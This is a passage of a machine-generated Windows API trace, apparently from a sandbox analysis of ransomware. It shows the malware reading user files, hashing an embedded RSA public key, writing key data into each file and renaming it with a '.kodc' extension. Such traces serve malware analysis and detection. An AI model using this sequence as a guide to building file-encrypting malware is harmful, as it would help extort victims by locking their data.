(HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0100.955] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0100.955] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7f08 [0100.955] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0100.955] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0100.955] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0100.955] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0100.955] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0100.955] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0100.955] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0100.955] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7f50 [0100.955] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0100.955] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7a28 [0100.955] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0100.955] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecb0 [0100.955] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0100.955] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0100.955] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0100.955] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0100.956] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7f20 | out: hHeap=0x630000) returned 1 [0100.956] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7f20 [0100.956] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0100.956] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0100.956] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0100.956] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c540 [0100.956] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0100.956] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32cef08 [0100.956] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0100.956] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c770 [0100.956] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0100.956] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c428 [0100.956] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7f20 | out: hHeap=0x630000) returned 1 [0100.956] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x9b9c950 [0100.956] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0100.956] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0100.956] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0100.956] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693158 | out: hHeap=0x630000) returned 1 [0100.956] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0100.956] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0100.956] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0100.956] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0100.956] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0100.957] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c950 | out: hHeap=0x630000) returned 1 [0100.957] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0100.957] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0100.957] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7f50 | out: hHeap=0x630000) returned 1 [0100.957] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0100.957] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0100.957] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0100.957] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7f38 | out: hHeap=0x630000) returned 1 [0100.957] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7f08 | out: hHeap=0x630000) returned 1 [0100.957] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0100.957] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0100.957] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0100.957] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7ef0 | out: hHeap=0x630000) returned 1 [0100.957] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb5ce0 | out: hHeap=0x630000) returned 1 [0100.957] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0100.957] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0100.957] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318138 | out: hHeap=0x630000) returned 1 [0100.957] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0100.957] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0100.957] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0100.957] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0100.957] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338dc8 | out: hHeap=0x630000) returned 1 [0100.957] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0100.957] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0100.957] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0100.958] WriteFile (in: hFile=0x5cc, lpBuffer=0x9bb8968*, nNumberOfBytesToWrite=0x13bc4, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9bb8968*, lpNumberOfBytesWritten=0x9e2fb14*=0x13bc4, lpOverlapped=0x0) returned 1 [0100.958] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8968 | out: hHeap=0x630000) returned 1 [0100.958] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x13bc9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.958] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0100.958] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0100.958] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.958] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x9b9c950 [0100.958] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9b9c950, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0100.958] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x694598 [0100.958] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c950 | out: hHeap=0x630000) returned 1 [0100.958] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.958] WriteFile (in: hFile=0x5cc, lpBuffer=0x694598*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x694598*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0100.958] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694598 | out: hHeap=0x630000) returned 1 [0100.959] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0100.959] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0100.959] CloseHandle (hObject=0x5cc) returned 1 [0100.960] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693158 [0100.960] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x890) returned 0x32d0db8 [0100.960] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693158 | out: hHeap=0x630000) returned 1 [0100.960] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pwaY\\HwzIFfRvkMh98zM1.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pway\\hwziffrvkmh98zm1.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pwaY\\HwzIFfRvkMh98zM1.avi.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pway\\hwziffrvkmh98zm1.avi.kodc")) returned 1 [0100.961] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0100.961] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.961] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.962] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c0 | out: hHeap=0x630000) returned 1 [0100.962] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6bccac50, ftCreationTime.dwHighDateTime=0x1d5c4e8, ftLastAccessTime.dwLowDateTime=0xb1b8acd0, ftLastAccessTime.dwHighDateTime=0x1d5c0a3, ftLastWriteTime.dwLowDateTime=0xb1b8acd0, ftLastWriteTime.dwHighDateTime=0x1d5c0a3, nFileSizeHigh=0x0, nFileSizeLow=0x5be6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qdLGdkG.gif", cAlternateFileName="")) returned 1 [0100.962] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.962] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8e) returned 0x65e7c0 [0100.962] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.962] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pwaY\\qdLGdkG.gif") returned=".gif" [0100.962] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pwaY\\qdLGdkG.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pway\\qdlgdkg.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0100.962] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=23526) returned 1 [0100.963] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0100.965] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x5bc0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.965] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0100.966] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0100.966] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.966] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.966] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x5be6, lpOverlapped=0x0) returned 1 [0100.966] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.966] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0100.966] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.966] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.967] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693158) returned 1 [0100.967] CryptCreateHash (in: hProv=0x693158, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0100.967] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0100.967] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0100.968] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0100.968] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0100.968] GetLastError () returned 0x0 [0100.968] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0100.968] CryptReleaseContext (hProv=0x693158, dwFlags=0x0) returned 1 [0100.968] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0100.968] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0100.968] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0100.968] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0100.968] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0100.968] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.968] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0100.968] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x5bf0) returned 0x9ba8d90 [0100.968] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0100.968] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0100.968] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0100.968] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0100.968] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0100.968] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338dc8 [0100.968] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb5ce0 [0100.968] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7ef0 [0100.968] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb5d28 [0100.968] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7f08 [0100.968] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7f38 [0100.969] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0100.969] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7f50 [0100.969] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0100.969] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0100.969] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0100.969] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x694598 [0100.969] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7f38 | out: hHeap=0x630000) returned 1 [0100.969] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7f50 | out: hHeap=0x630000) returned 1 [0100.969] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0100.969] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0100.969] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694598 | out: hHeap=0x630000) returned 1 [0100.969] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0100.969] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec90 [0100.969] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7f50 [0100.969] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0100.969] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x9bb7f38 [0100.969] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec40 [0100.969] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c658 [0100.969] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0100.969] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0100.969] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0100.969] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c770 [0100.969] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0100.969] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0100.969] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0100.969] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7f50 | out: hHeap=0x630000) returned 1 [0100.969] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0100.969] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7f38 | out: hHeap=0x630000) returned 1 [0100.969] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0100.969] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0100.970] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0100.970] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0100.970] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338dc8 | out: hHeap=0x630000) returned 1 [0100.970] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0100.970] GetCurrentThreadId () returned 0x42c [0100.970] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0100.970] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba7b28 [0100.970] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0100.970] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693158 [0100.970] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0100.970] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0100.970] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0100.970] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0100.970] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.970] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.970] GetCurrentThreadId () returned 0x42c [0100.970] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.970] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.970] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0100.970] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.970] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.970] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.970] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.970] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0100.970] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0100.970] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0100.970] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x3318138 [0100.970] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0100.970] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0100.970] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0100.971] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0100.971] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0100.971] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0100.971] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0100.971] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0100.971] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0100.971] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0100.971] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) 